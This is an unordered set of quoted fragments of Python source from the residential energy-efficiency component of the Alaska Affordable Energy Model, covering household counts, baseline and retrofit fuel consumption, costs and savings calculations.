Heating Biomass (cords/year) Cost Baseline\", \"Residential:", "self.calc_proposed_kWh_consumption() if self.cd[\"model heating fuel\"]: #~ self.calc_init_HH() self.calc_savings_opportunities() self.calc_init_consumption() self.calc_baseline_fuel_consumption() self.calc_proposed_fuel_consumption() #~ self.set_forecast_columns()", "cordwood consumption init_gas : float initial natural gas fuel consumption init_LP : 
float", "def calc_annual_electric_savings (self): \"\"\"calculate annual electric savings created by the project Attributes ----------", "r_NG = self.proposed_fuel_gas_consumption/constants.mmbtu_to_Mcf s_NG = b_NG - r_NG b_NG_cost = self.baseline_fuel_gas_consumption * gas_price", "calc_baseline_fuel_consumption (self): \"\"\"Calculate baseline fuel consumption Attributes: baseline_fuel_Hoil_consumption : np.array baseline heating fuel", "calc_annual_heating_savings (self): \"\"\"calculate annual heating savings created by the project Attributes ---------- annual_heating_savings", "self.init_HH -rd[\"BEES Number\"] -rd[\"Post-Retrofit Number\"] self.opportunity_HH = np.float64( self.opportunity_HH ) #~ print self.opportunity_HH", "= self.comp_specs['data']['Total Occupied'] pop = self.forecast.base_pop self.init_HH = int(round(HH*(val / pop))) def calc_init_consumption", "self.baseline_fuel_kWh_consumption = self.init_kWh+\\ np.float64(rd[\"Electricity\"]/100.0)*\\ scaler * constants.mmbtu_to_kWh #~ self.baseline_fuel_coal_consumption #~ self.baseline_fuel_solar_consumption #~ self.baseline_fuel_other_consumption", "community data module, see information on CommunityData Object aaem.forecast : forecast module, see", "savings in natural gas fuel consumption savings_LP : float savings in propane consumption", "Gas (Mcf/year) Consumption Savings\": s_NG, \"Residential: Heating Natural Gas (Mcf/year) Cost Baseline\": b_NG_cost,", "self.proposed_fuel_kWh_consumption/constants.mmbtu_to_kWh s_elec = b_elec - r_elec b_elec_cost = self.baseline_fuel_kWh_consumption * elec_price r_elec_cost =", "LP_price s_LP_cost = b_LP_cost - r_LP_cost b_NG = self.baseline_fuel_gas_consumption/constants.mmbtu_to_Mcf r_NG = self.proposed_fuel_gas_consumption/constants.mmbtu_to_Mcf s_NG", "values initial value: forecast cd : dictionary general data for a community. 
Initial", "np.array baseline cost of heating fuels per year \"\"\" HF_price = (self.diesel_prices +", "* (1/constants.mmbtu_to_Mcf) +\\ self.baseline_fuel_kWh_consumption * (1/constants.mmbtu_to_kWh) +\\ self.baseline_fuel_LP_consumption * (1/constants.mmbtu_to_gal_LP) def calc_baseline_kWh_consumption (self):", "total = rd[\"Total Consumption (MMBtu)\"] + \\ rd[\"BEES Total Consumption (MMBtu)\"] + \\", "/ 100.0 percent_accounted += amnt self.init_HF = self.calc_consumption_by_fuel(amnt, total, HH, constants.mmbtu_to_gal_HF) amnt =", "line heating fuel costs Attributes ---------- baseline_HF_cost : np.array baseline cost of heating", "Heat (kWh/year) Consumption Savings\": s_elec, \"Residential: Electric Heat (kWh/year) Cost Baseline\": b_elec_cost, \"Residential:", "(self): \"\"\"Get total fuel saved. Returns ------- float the total fuel saved in", "heating fuel costs Attributes ---------- baseline_HF_cost : np.array baseline cost of heating fuels", "= self.proposed_kWh_consumption * kWh_cost def calc_capital_costs (self): \"\"\"Calculate the capital costs. Attributes ----------", "Retrofit\", \"Residential: Heating Fuel All (MMBtu/year) Consumption Savings\", \"Residential: Heating Oil (gallons/year) Cost", "that have not been retrofit as of 2010, the performance improvements as a", "\\ self.proposed_fuel_Hoil_consumption * HF_price + \\ self.proposed_fuel_wood_consumption * wood_price + \\ self.proposed_fuel_gas_consumption *", "\\ rd[\"Pre-Retrofit Avg EUI (MMBtu/sf)\"] * self.opportunity_HH #~ self.baseline_total_energy_consumption = total HH =", "----- Accepted scalers: capital costs. 
\"\"\" self.was_run = True self.reason = \"OK\" tag", "+ \\ self.proposed_fuel_wood_consumption * wood_price + \\ self.proposed_fuel_gas_consumption * gas_price + \\ self.proposed_fuel_LP_consumption", "in electric consumption savings_mmbtu: float total savings in mmbtu \"\"\" rd = self.comp_specs['data']", "directory : path output directory \"\"\" if not self.was_run: return if self.cd[\"model financial\"]:", "\"Residential: Heating Propane (gallons/year) Cost Post Retrofit\": r_LP_cost, \"Residential: Heating Propane (gallons/year) Cost", "consumption for a community Attributes ---------- baseline_kWh_consumption : np.array electric consumption per yer", "self.calc_consumption_by_fuel(amnt, total, 1, constants.mmbtu_to_kWh) #~ self.savings_coal #~ self.savings_solar #~ self.savings_other self.savings_mmbtu = self.savings_HF", "return (base_heat - post_heat) * constants.mmbtu_to_gal_HF def get_total_energy_produced (self): \"\"\"Get total energy produced.", "All (MMBtu/year) Cost Baseline\", \"Residential: Heating Fuel All (MMBtu/year) Cost Post Retrofit\", \"Residential:", "self.calc_baseline_kWh_consumption() self.calc_proposed_kWh_consumption() if self.cd[\"model heating fuel\"]: #~ self.calc_init_HH() self.calc_savings_opportunities() self.calc_init_consumption() self.calc_baseline_fuel_consumption() self.calc_proposed_fuel_consumption() #~", "self.proposed_fuel_LP_consumption * LP_price s_LP_cost = b_LP_cost - r_LP_cost b_NG = self.baseline_fuel_gas_consumption/constants.mmbtu_to_Mcf r_NG =", "(MMBtu/year) Consumption Baseline\": self.get_base_HF_use(), \"Residential: Heating Fuel All (MMBtu/year) Consumption Post Retrofit\": self.get_proposed_HF_use(),", "initial value: diag or new diagnostics object forecast : forecast community forecast for", "calc_baseline_kWh_consumption (self): \"\"\"Calculate the baseline kWh consumption for a community Attributes ---------- baseline_kWh_consumption", "consumption Parameters ---------- fuel_amnt: float % of fuel used 
total_consumption : float total", "consumption baseline_fuel_wood_consumption : np.array baseline cordwood consumption baseline_fuel_gas_consumption : np.array baseline natural gas", "constants.mmbtu_to_gal_HF) amnt = np.float64(rd[\"Wood\"]) / 100.0 self.savings_wood = avg_EUI_reduction * self.opportunity_HH * \\", "savings opportunities Attributes ---------- opportunity_HH : int Houses that can be retrofit savings_HF", "HH = self.households self.baseline_kWh_consumption = self.avg_kWh_consumption_per_HH * HH def calc_baseline_fuel_cost (self): \"\"\"calculate base", "Heat (kWh/year) Cost Post Retrofit\", \"Residential: Electric Heat (kWh/year) Cost Savings\", \"Residential: Heating", "float(self.base_pop) / \\ self.comp_specs['data']['Total Occupied'] households = np.round(self.forecast.population / np.float64(peps_per_house)) households.columns = [\"HH\"]", "Cost Baseline\", \"Residential: Heating Biomass (cords/year) Cost Post Retrofit\", \"Residential: Heating Biomass (cords/year)", "config import COMPONENT_NAME, UNKNOWN class ResidentialBuildings(AnnualSavings): \"\"\"Residential energy efficiency component of the Alaska", "LP_price = self.cd['propane price'] gas_price = self.cd['natural gas price'] else: HF_price = np.nan", "self.forecast = forecast self.refit_cost_rate = \\ self.comp_specs['average refit cost'] * \\ community_data.get_item( 'community',", "- \\ self.proposed_HF_cost def set_forecast_columns (self): \"\"\"Set columns in the the forecast to", "np.array baseline total heating fuel consumption \"\"\" rd = self.comp_specs['data'] self.fuel_oil_percent = rd[\"Fuel", ": float initial natural gas fuel consumption init_LP : float initial propane consumption", "None, prerequisites = {}): \"\"\"Class initialiser Parameters ---------- community_data : CommunityData CommunityData Object", "amnt = np.float64(rd[\"Utility Gas\"]) / 100.0 percent_accounted += amnt self.init_gas = self.calc_consumption_by_fuel(amnt, total,", "baseline total heating fuel 
consumption \"\"\" rd = self.comp_specs['data'] self.fuel_oil_percent = rd[\"Fuel Oil\"]", "(self, fuel_amnt, total_consumption, HH, cf): \"\"\"calculate consumption by fuel from the total consumption", "electricity costs Attributes ---------- proposed_kWh_cost: np.array proposed electricity cost \"\"\" kWh_cost = self.cd[\"electric", "scaler * constants.mmbtu_to_cords self.baseline_fuel_gas_consumption = self.init_gas + \\ np.float64(rd[\"Utility Gas\"]/100.0) * \\ scaler", "Post Retrofit\", \"Residential: Heating Natural Gas (Mcf/year) Consumption Savings\", \"Residential: Heating Fuel All", "community_data.get_item( 'community', 'regional construction multiplier' ) self.set_project_life_details( self.comp_specs[\"start year\"], self.comp_specs[\"lifetime\"] ) yr =", ": float initial heating oil consumption init_wood : float initial heating cordwood consumption", "retrofit savings_HF : float savings in heating oil consumption savings_wood : float savings", "(kWh/year) Consumption Baseline\", \"Residential: Electric Heat (kWh/year) Consumption Post Retrofit\", \"Residential: Electric Heat", "Oil\"] / 100.0 HH = self.households #~ print HH area = np.float64(rd[\"Pre-Retrofit Avg", "proposed heating cost Attributes ---------- proposed_HF_cost : np.array proposed heating fuel cost \"\"\"", "100.0 percent_accounted += amnt self.init_HF = self.calc_consumption_by_fuel(amnt, total, HH, constants.mmbtu_to_gal_HF) amnt = np.float64(rd[\"Wood\"])", "Consumption Post Retrofit\", \"Residential: Heating Propane (gallons/year) Consumption Savings\", \"Residential: Heating Natural Gas", "Oil (gallons/year) Cost Post Retrofit\": r_oil_cost , \"Residential: Heating Oil (gallons/year) Cost Savings\":", "for first year of project \"\"\" val = self.forecast.get_population(self.start_year) HH = self.comp_specs['data']['Total Occupied']", "component \"\"\" years = range(self.start_year,self.end_year) self.forecast.add_heating_fuel_column(\\ \"heating_fuel_residential_consumed 
[gallons/year]\", years, self.baseline_fuel_Hoil_consumption) self.forecast.add_heating_fuel_column(\\ \"heating_fuel_residential_consumed [mmbtu/year]\",", "EUI (MMBtu/sf)\"]) avg_EUI_reduction = np.float64(rd[\"Post-Retrofit Avg. EUI Reduction\"]) total = area * EUI", "amnt self.init_LP = self.calc_consumption_by_fuel(amnt, total, HH, constants.mmbtu_to_gal_LP) amnt = np.float64(rd[\"Electricity\"]) / 100.0 percent_accounted", "def get_fuel_total_saved (self): \"\"\"Get total fuel saved. Returns ------- float the total fuel", "proposed_fuel_LP_consumption : np.array proposed LP consumption proposed_fuel_gas_consumption : np.array proposed natural gas consumption", "ix[self.start_year:self.end_year] kWh_cost = kWh_cost.T.values[0] # kWh/yr*$/kWh self.proposed_kWh_cost = self.proposed_kWh_consumption * kWh_cost def calc_capital_costs", "= np.round(self.forecast.population / np.float64(peps_per_house)) households.columns = [\"HH\"] self.households = households.ix[self.start_year:self.end_year].T.values[0] val = self.forecast.get_population(self.start_year)", "baseline_fuel_kWh_consumption : np.array baseline electricity consumption baseline_HF_consumption : np.array baseline total heating fuel", "self.baseline_fuel_LP_consumption/constants.mmbtu_to_gal_LP r_LP = self.proposed_fuel_LP_consumption/constants.mmbtu_to_gal_LP s_LP = b_LP - r_LP b_LP_cost = self.baseline_fuel_LP_consumption *", "self.baseline_fuel_kWh_consumption/constants.mmbtu_to_kWh) self.forecast.add_heating_fuel_column(\\ \"propane_residential_consumed [gallons/year]\", years, self.baseline_fuel_LP_consumption) self.forecast.add_heating_fuel_column(\\ \"propane_residential_consumed [mmbtu/year]\", years, self.baseline_fuel_LP_consumption/constants.mmbtu_to_gal_LP) self.forecast.add_heat_demand_column(\\ \"heat_energy_demand_residential", "100.0 self.savings_gas = avg_EUI_reduction * self.opportunity_HH * \\ self.calc_consumption_by_fuel(amnt, total, 1, constants.mmbtu_to_Mcf) amnt", "s_LP_cost, 
\"Residential: Heating Natural Gas (Mcf/year) Consumption Baseline\": b_NG, \"Residential: Heating Natural Gas", "Savings\", \"Residential: Electric Heat (kWh/year) Cost Baseline\", \"Residential: Electric Heat (kWh/year) Cost Post", "np.array proposed heating oil consumption proposed_fuel_wood_consumption : np.array proposed cordwood consumption proposed_fuel_LP_consumption :", "failure if run == False Notes ----- Accepted scalers: capital costs. \"\"\" self.was_run", "= self.proposed_fuel_gas_consumption * gas_price s_NG_cost = b_NG_cost - r_NG_cost years = np.array(range(self.project_life)) +", "self.baseline_fuel_gas_consumption * (1/constants.mmbtu_to_Mcf) +\\ self.baseline_fuel_kWh_consumption * (1/constants.mmbtu_to_kWh) +\\ self.baseline_fuel_LP_consumption * (1/constants.mmbtu_to_gal_LP) def calc_baseline_kWh_consumption", "Heat (kWh/year) Cost Post Retrofit\": r_elec_cost, \"Residential: Electric Heat (kWh/year) Cost Savings\": s_elec_cost,", "Heating Natural Gas (Mcf/year) Cost Baseline\", \"Residential: Heating Natural Gas (Mcf/year) Cost Post", "self.init_HH = int(round(HH*(val / pop))) def calc_init_consumption (self): \"\"\"Calculate the initial consumption for", "total consumption for residential buildings HH : float a # of houses cf:", "Retrofit\": r_bio, \"Residential: Heating Biomass (cords/year) Consumption Savings\": s_bio, \"Residential: Heating Biomass (cords/year)", "for tracking error/warning messages prerequisites : dictionary of components, optional prerequisite component data", "---------- capital_costs : float total cost of improvements ($) \"\"\" self.capital_costs = self.opportunity_HH", "= self.init_kWh+\\ np.float64(rd[\"Electricity\"]/100.0)*\\ scaler * constants.mmbtu_to_kWh #~ self.baseline_fuel_coal_consumption #~ self.baseline_fuel_solar_consumption #~ self.baseline_fuel_other_consumption if", "as np from pandas import DataFrame import os from aaem.components.annual_savings import AnnualSavings from", "pass df = df[[ 
\"Residential: Heating Oil (gallons/year) Consumption Baseline\", \"Residential: Heating Oil", "Baseline\", \"Residential: Electric Heat (kWh/year) Consumption Post Retrofit\", \"Residential: Electric Heat (kWh/year) Consumption", "r_bio, \"Residential: Heating Biomass (cords/year) Consumption Savings\": s_bio, \"Residential: Heating Biomass (cords/year) Cost", "home is also calculated. Parameters ---------- community_data : CommunityData CommunityData Object for a", "self.cd = community_data.get_section('community') #~ self.copied_elec = community_data.copies.\\ #~ ix[\"yearly electric summary\"].values[0] if self.cd[\"model", "be retrofit savings_HF : float savings in heating oil consumption savings_wood : float", "int(round(HH*(val / pop))) def calc_init_consumption (self): \"\"\"Calculate the initial consumption for each fuel", "as constants from config import COMPONENT_NAME, UNKNOWN class ResidentialBuildings(AnnualSavings): \"\"\"Residential energy efficiency component", "not been retrofit as of 2010, the performance improvements as a percentage of", "proposed_fuel_kWh_consumption : np.array proposed electric consumption proposed_HF_consumption : np.array proposed total electric consumption", "was \" + str(self.avg_kWh_consumption_per_HH) +\\ \" in \" + str(yr)) def calc_init_HH (self):", "\\ self.baseline_fuel_Hoil_consumption - self.savings_HF self.proposed_fuel_wood_consumption = \\ self.baseline_fuel_wood_consumption - self.savings_wood self.proposed_fuel_LP_consumption = \\", "Heating Fuel All (MMBtu/year) Consumption Post Retrofit\": self.get_proposed_HF_use(), \"Residential: Heating Fuel All (MMBtu/year)", "Occupied'] pop = self.forecast.base_pop self.init_HH = int(round(HH*(val / pop))) def calc_init_consumption (self): \"\"\"Calculate", "Biomass (cords/year) Cost Baseline\": b_bio_cost, \"Residential: Heating Biomass (cords/year) Cost Post Retrofit\": r_bio_cost,", "= b_oil_cost - r_oil_cost b_bio = 
self.baseline_fuel_wood_consumption/constants.mmbtu_to_cords r_bio = self.proposed_fuel_wood_consumption/constants.mmbtu_to_cords s_bio = b_bio", "Natural Gas (Mcf/year) Consumption Savings\", \"Residential: Heating Fuel All (MMBtu/year) Consumption Baseline\", \"Residential:", "# of households for the first year of the project Attributes ---------- init_HH", "\\ (1/constants.mmbtu_to_cords) +\\ self.baseline_fuel_gas_consumption * (1/constants.mmbtu_to_Mcf) +\\ self.baseline_fuel_kWh_consumption * (1/constants.mmbtu_to_kWh) +\\ self.baseline_fuel_LP_consumption *", "in the component runs to completion, False otherwise reason : string lists reason", "total HH = self.init_HH percent_accounted = 0 amnt = np.float64(rd[\"Fuel Oil\"]) / 100.0", "return np.float64(fuel_amnt * (total_consumption - HH_consumption) * cf) def calc_baseline_fuel_consumption (self): \"\"\"Calculate baseline", "Consumption Post Retrofit\", \"Residential: Heating Biomass (cords/year) Consumption Savings\", \"Residential: Electric Heat (kWh/year)", "(cords/year) Consumption Baseline\", \"Residential: Heating Biomass (cords/year) Consumption Post Retrofit\", \"Residential: Heating Biomass", "Cost Savings\": s_LP_cost, \"Residential: Heating Natural Gas (Mcf/year) Consumption Baseline\": b_NG, \"Residential: Heating", "Model: This module estimates the potential improvements to heating efficiency of residential buildings", "Propane (gallons/year) Cost Post Retrofit\", \"Residential: Heating Propane (gallons/year) Cost Savings\", \"Residential: Heating", "self.forecast.add_heating_fuel_column(\\ \"gas_residential_consumed [mmbtu/year]\", years, self.baseline_fuel_gas_consumption/constants.mmbtu_to_Mcf) self.forecast.add_heating_fuel_column(\\ \"electric_residential_consumed [kWh/year]\", years, self.baseline_fuel_kWh_consumption) self.forecast.add_heating_fuel_column(\\ \"electric_residential_consumed [mmbtu/year]\",", "retrofit was negative, setting to 0\" ) ## % as decimal #~ 
self.percent_savings", "savings_gas : float savings in natural gas fuel consumption savings_LP : float savings", ": diagnostics, optional diagnostics for tracking error/warning messages prerequisites : dictionary of components,", "Efficiency', 'data' )['average kWh per house'] #~ self.avg_monthly_consumption = ave_con/12 if (avg_con <", "buildings (homes). Consumption and savings are based on the number of units that", "Natural Gas (Mcf/year) Cost Baseline\": b_NG_cost, \"Residential: Heating Natural Gas (Mcf/year) Cost Post", "self.savings_HF = avg_EUI_reduction * self.opportunity_HH * \\ self.calc_consumption_by_fuel(amnt, total, 1, constants.mmbtu_to_gal_HF) amnt =", "if run == False Notes ----- Accepted scalers: capital costs. \"\"\" self.was_run =", "houses = int(self.comp_specs['data']['Total Occupied']) #~ r_con = self.forecast.base_res_consumption avg_con = float(self.comp_specs['data']['average kWh per", "in directory Parameters ---------- directory : path output directory \"\"\" if not self.was_run:", "Natural Gas (Mcf/year) Consumption Post Retrofit\", \"Residential: Heating Natural Gas (Mcf/year) Consumption Savings\",", "* elec_price s_elec_cost = b_elec_cost - r_elec_cost b_LP = self.baseline_fuel_LP_consumption/constants.mmbtu_to_gal_LP r_LP = self.proposed_fuel_LP_consumption/constants.mmbtu_to_gal_LP", "# 500 average energy use, 12 months in a year. 
That's where the", "Consumption Post Retrofit\": r_LP, \"Residential: Heating Propane (gallons/year) Consumption Savings\": s_LP, \"Residential: Heating", "0 # coal,solar, other def calc_proposed_kWh_consumption (self): \"\"\"calculate the proposed kWh consumption for", "(kWh/year) Consumption Baseline\": b_elec, \"Residential: Electric Heat (kWh/year) Consumption Post Retrofit\": r_elec, \"Residential:", "\"\"\"calculate base line heating fuel costs Attributes ---------- baseline_HF_cost : np.array baseline cost", "diagnostics for tracking error/warning messages prerequisites : dictionary of components, optional prerequisite component", "Heating Propane (gallons/year) Cost Baseline\", \"Residential: Heating Propane (gallons/year) Cost Post Retrofit\", \"Residential:", "the Alaska Affordable Energy Model: This module estimates the potential improvements to heating", "gas price'] == 0: self.proposed_fuel_gas_consumption = 0 # coal,solar, other def calc_proposed_kWh_consumption (self):", "wood_price + \\ self.baseline_fuel_gas_consumption * gas_price + \\ self.baseline_fuel_LP_consumption * LP_price + \\", "components, optional prerequisite component data \"\"\" self.diagnostics = diag if self.diagnostics == None:", "100.0 self.savings_wood = avg_EUI_reduction * self.opportunity_HH * \\ self.calc_consumption_by_fuel(amnt, total, 1, constants.mmbtu_to_cords) amnt", "#~ houses = int(self.comp_specs['data']['Total Occupied']) #~ r_con = self.forecast.base_res_consumption avg_con = float(self.comp_specs['data']['average kWh", "the proposed kWh consumption for a community Attributes ---------- proposed_kWh_consumption : np.array set", "# coal,solar, other def calc_baseline_kWh_cost (self): \"\"\"calculate baseline electricity costs Attributes ---------- baseline_kWh_cost", "* self.opportunity_HH * \\ self.calc_consumption_by_fuel(amnt, total, 1, constants.mmbtu_to_gal_LP) amnt = np.float64(rd[\"Electricity\"]) / 100.0", "str(round(percent_accounted)) + \\ \" of 
residential fuel sources accounted for\" self.diagnostics.add_note(self.component_name, msg) def", "diagnostics object forecast : forecast community forecast for estimating future values initial value:", "np.float64(peps_per_house)) households.columns = [\"HH\"] self.households = households.ix[self.start_year:self.end_year].T.values[0] val = self.forecast.get_population(self.start_year) HH =self.comp_specs['data']['Total Occupied']", "the one in each of these function calls is an identity amnt =", "self.savings_gas self.proposed_fuel_kWh_consumption = \\ self.baseline_fuel_kWh_consumption - self.savings_kWh self.proposed_HF_consumption = \\ self.baseline_HF_consumption - self.savings_mmbtu", "= df.round().astype(int) except ValueError: pass df = df[[ \"Residential: Heating Oil (gallons/year) Consumption", "Cost Savings\", \"Residential: Heating Biomass (cords/year) Cost Baseline\", \"Residential: Heating Biomass (cords/year) Cost", "EUI = np.float64(rd[\"Pre-Retrofit Avg EUI (MMBtu/sf)\"]) avg_EUI_reduction = np.float64(rd[\"Post-Retrofit Avg. 
EUI Reduction\"]) total", "Fuel All (MMBtu/year) Consumption Baseline\", \"Residential: Heating Fuel All (MMBtu/year) Consumption Post Retrofit\",", "df = DataFrame({ \"Residential: Heating Fuel All (MMBtu/year) Consumption Baseline\": self.get_base_HF_use(), \"Residential: Heating", "pandas import DataFrame import os from aaem.components.annual_savings import AnnualSavings from aaem.community_data import CommunityData", "== 0: self.baseline_fuel_gas_consumption = 0 self.baseline_HF_consumption = \\ self.baseline_fuel_Hoil_consumption * \\ (1/constants.mmbtu_to_gal_HF) +\\", "values calculated in this component \"\"\" years = range(self.start_year,self.end_year) self.forecast.add_heating_fuel_column(\\ \"heating_fuel_residential_consumed [gallons/year]\", years,", "= np.zeros(self.project_life) def calc_annual_heating_savings (self): \"\"\"calculate annual heating savings created by the project", "amnt = np.float64(rd[\"Fuel Oil\"]) / 100.0 self.savings_HF = avg_EUI_reduction * self.opportunity_HH * \\", "\"\"\" HH = self.households self.baseline_kWh_consumption = self.avg_kWh_consumption_per_HH * HH def calc_baseline_fuel_cost (self): \"\"\"calculate", "Post Retrofit\": r_oil, \"Residential: Heating Oil (gallons/year) Consumption Savings\": s_oil, \"Residential: Heating Oil", "\"Residential: Heating Oil (gallons/year) Consumption Savings\", \"Residential: Heating Biomass (cords/year) Consumption Baseline\", \"Residential:", "= np.nan gas_price = np.nan b_oil = self.baseline_fuel_Hoil_consumption/constants.mmbtu_to_gal_HF r_oil = self.proposed_fuel_Hoil_consumption/constants.mmbtu_to_gal_HF s_oil =", "b_NG_cost = self.baseline_fuel_gas_consumption * gas_price r_NG_cost = self.proposed_fuel_gas_consumption * gas_price s_NG_cost = b_NG_cost", "Retrofit\": self.get_proposed_HF_use(), \"Residential: Heating Fuel All (MMBtu/year) Consumption Savings\": self.get_base_HF_use() -\\ self.get_proposed_HF_use(), \"Residential:", "avg_EUI_reduction * self.opportunity_HH * \\ 
self.calc_consumption_by_fuel(amnt, total, 1, constants.mmbtu_to_gal_LP) amnt = np.float64(rd[\"Electricity\"]) /", "calc_proposed_kWh_cost (self): \"\"\"Calculate post retrofit electricity costs Attributes ---------- proposed_kWh_cost: np.array proposed electricity", "+= amnt self.init_LP = self.calc_consumption_by_fuel(amnt, total, HH, constants.mmbtu_to_gal_LP) amnt = np.float64(rd[\"Electricity\"]) / 100.0", "to 0\" ) ## % as decimal #~ self.percent_savings = rd[\"opportunity_total_percent_community_savings\"] #~ self.percent_savings", "data for a community. Initial value: 'Residential Buildings' section of community_data See also", "Attributes ---------- annual_electric_savings : np.array electric savings ($/year) are the difference in the", "in mmbtu \"\"\" rd = self.comp_specs['data'] ## #HH self.opportunity_HH = self.init_HH -rd[\"BEES Number\"]", "self.savings_LP self.proposed_fuel_gas_consumption = \\ self.baseline_fuel_gas_consumption - self.savings_gas self.proposed_fuel_kWh_consumption = \\ self.baseline_fuel_kWh_consumption - self.savings_kWh", "proposed kWh consumption for a community Attributes ---------- proposed_kWh_consumption : np.array set to", "Heating Biomass (cords/year) Consumption Post Retrofit\", \"Residential: Heating Biomass (cords/year) Consumption Savings\", \"Residential:", "\\ self.comp_specs['data']['Total Occupied'] households = np.round(self.forecast.population / np.float64(peps_per_house)) households.columns = [\"HH\"] self.households =", "+ \\ self.proposed_fuel_kWh_consumption * gas_price def calc_proposed_kWh_cost (self): \"\"\"Calculate post retrofit electricity costs", "= int(self.comp_specs['data']['Total Occupied']) #~ r_con = self.forecast.base_res_consumption avg_con = float(self.comp_specs['data']['average kWh per house'])", "EUI self.baseline_fuel_Hoil_consumption = \\ self.init_HF+np.float64(rd[\"Fuel Oil\"]/100.0)*\\ scaler * constants.mmbtu_to_gal_HF self.baseline_fuel_wood_consumption = \\ 
self.init_wood+np.float64(rd[\"Wood\"]/100.0)*\\", "= \\ self.baseline_fuel_Hoil_consumption - self.savings_HF self.proposed_fuel_wood_consumption = \\ self.baseline_fuel_wood_consumption - self.savings_wood self.proposed_fuel_LP_consumption =", "\"Residential: Heating Oil (gallons/year) Consumption Post Retrofit\": r_oil, \"Residential: Heating Oil (gallons/year) Consumption", "per house'] #~ self.avg_monthly_consumption = ave_con/12 if (avg_con < con_threshold) or np.isnan(avg_con): avg_con", "Returns ------- float: fuel consumed for a type of fuel \"\"\" HH_consumption =", "\"Residential: Heating Propane (gallons/year) Cost Post Retrofit\", \"Residential: Heating Propane (gallons/year) Cost Savings\",", "self.init_LP = self.calc_consumption_by_fuel(amnt, total, HH, constants.mmbtu_to_gal_LP) amnt = np.float64(rd[\"Electricity\"]) / 100.0 percent_accounted +=", "float the total energy produced \"\"\" # no electric return self.baseline_HF_consumption[:self.actual_project_life] - \\", "years = np.array(range(self.project_life)) + self.start_year df = DataFrame({ \"Residential: Heating Fuel All (MMBtu/year)", "heating savings ($/year) \"\"\" self.annual_heating_savings = self.baseline_HF_cost - \\ self.proposed_HF_cost def set_forecast_columns (self):", "self.comp_specs['min kWh per household'] yr = int(self.comp_specs['data']['Year']) #~ houses = int(self.comp_specs['data']['Total Occupied']) #~", "house. Attributes ---------- avg_kWh_consumption_per_HH : float average electric consumption per household (kWh/year). >=", "per house']) if not self.intertie_data is None: avg_con = self.intertie_data.get_item( 'Residential Energy Efficiency',", "(cords/year) Cost Post Retrofit\": r_bio_cost, \"Residential: Heating Biomass (cords/year) Cost Savings\": s_bio_cost, \"Residential:", "proposed heating fuel cost \"\"\" HF_price = (self.diesel_prices + self.cd['heating fuel premium']) wood_price", "costs. 
\"\"\" self.was_run = True self.reason = \"OK\" tag = self.cd['file id'].split('+') if", "\\ self.baseline_fuel_wood_consumption - self.savings_wood self.proposed_fuel_LP_consumption = \\ self.baseline_fuel_LP_consumption - self.savings_LP self.proposed_fuel_gas_consumption = \\", "\"\"\"Residential energy efficiency component of the Alaska Affordable Energy Model: This module estimates", "gas_price = self.cd['natural gas price'] else: HF_price = np.nan wood_price = np.nan elec_price", ": float savings in propane consumption savings_kWh : float savings in electric consumption", "if not self.intertie_data is None: avg_con = self.intertie_data.get_item( 'Residential Energy Efficiency', 'data' )['average", "numpy as np from pandas import DataFrame import os from aaem.components.annual_savings import AnnualSavings", "Heating Biomass (cords/year) Consumption Savings\", \"Residential: Electric Heat (kWh/year) Consumption Baseline\", \"Residential: Electric", "Consumption Baseline\": b_oil, \"Residential: Heating Oil (gallons/year) Consumption Post Retrofit\": r_oil, \"Residential: Heating", "difference in the base and proposed fuel costs \"\"\" self.annual_electric_savings = np.zeros(self.project_life) def", "Baseline\", \"Residential: Heating Natural Gas (Mcf/year) Cost Post Retrofit\", \"Residential: Heating Natural Gas", "aaem.forecast import Forecast from aaem.diagnostics import Diagnostics import aaem.constants as constants from config", "diag if self.diagnostics == None: self.diagnostics = diagnostics() self.intertie_data = community_data.intertie_data self.cd =", "if (avg_con < con_threshold) or np.isnan(avg_con): avg_con = con_threshold self.diagnostics.add_note(self.component_name, (\"Average residential Electric", "self.opportunity_HH * \\ self.calc_consumption_by_fuel(amnt, total, 1, constants.mmbtu_to_kWh) #~ self.savings_coal #~ self.savings_solar #~ self.savings_other", "= b_elec - r_elec b_elec_cost = self.baseline_fuel_kWh_consumption * elec_price 
r_elec_cost = self.proposed_fuel_kWh_consumption *", "average energy use, 12 months in a year. That's where the 6000.0 #", "of the pre-retrofit consumption, and the forecasted price of offset heating fuels. The", "Savings ($/year)\", \"Residential: Net Benefit ($/year)\" ]] df[\"community\"] = self.cd['name'] df[\"population\"] = self.forecast.get_population(self.start_year,", ": Forecast forecast for a community diagnostics : diagnostics, optional diagnostics for tracking", "self.avg_kWh_consumption_per_HH = avg_con self.diagnostics.add_note(self.component_name, \"Average consumption was \" + str(self.avg_kWh_consumption_per_HH) +\\ \" in", "savings_wood : float savings in heating cordwood consumption savings_gas : float savings in", "\"OK\" tag = self.cd['file id'].split('+') if len(tag) > 1 and tag[1] != 'residential':", "= \\ self.baseline_fuel_Hoil_consumption * HF_price + \\ self.baseline_fuel_wood_consumption * wood_price + \\ self.baseline_fuel_gas_consumption", "mmbtu \"\"\" rd = self.comp_specs['data'] ## #HH self.opportunity_HH = self.init_HH -rd[\"BEES Number\"] -rd[\"Post-Retrofit", "+ self.cd['heating fuel premium']) wood_price = self.cd['cordwood price'] elec_price = self.elec_prices[self.start_year-self.start_year: self.end_year-self.start_year] LP_price", "Natural Gas (Mcf/year) Consumption Baseline\": b_NG, \"Residential: Heating Natural Gas (Mcf/year) Consumption Post", "np.array electric savings ($/year) are the difference in the base and proposed fuel", "Consumption Baseline\": self.get_base_HF_use(), \"Residential: Heating Fuel All (MMBtu/year) Consumption Post Retrofit\": self.get_proposed_HF_use(), \"Residential:", "* area * EUI self.baseline_fuel_Hoil_consumption = \\ self.init_HF+np.float64(rd[\"Fuel Oil\"]/100.0)*\\ scaler * constants.mmbtu_to_gal_HF self.baseline_fuel_wood_consumption", "(SF)\"] * \\ rd[\"Pre-Retrofit Avg EUI (MMBtu/sf)\"] * self.opportunity_HH #~ self.baseline_total_energy_consumption = total", "- self.savings_wood 
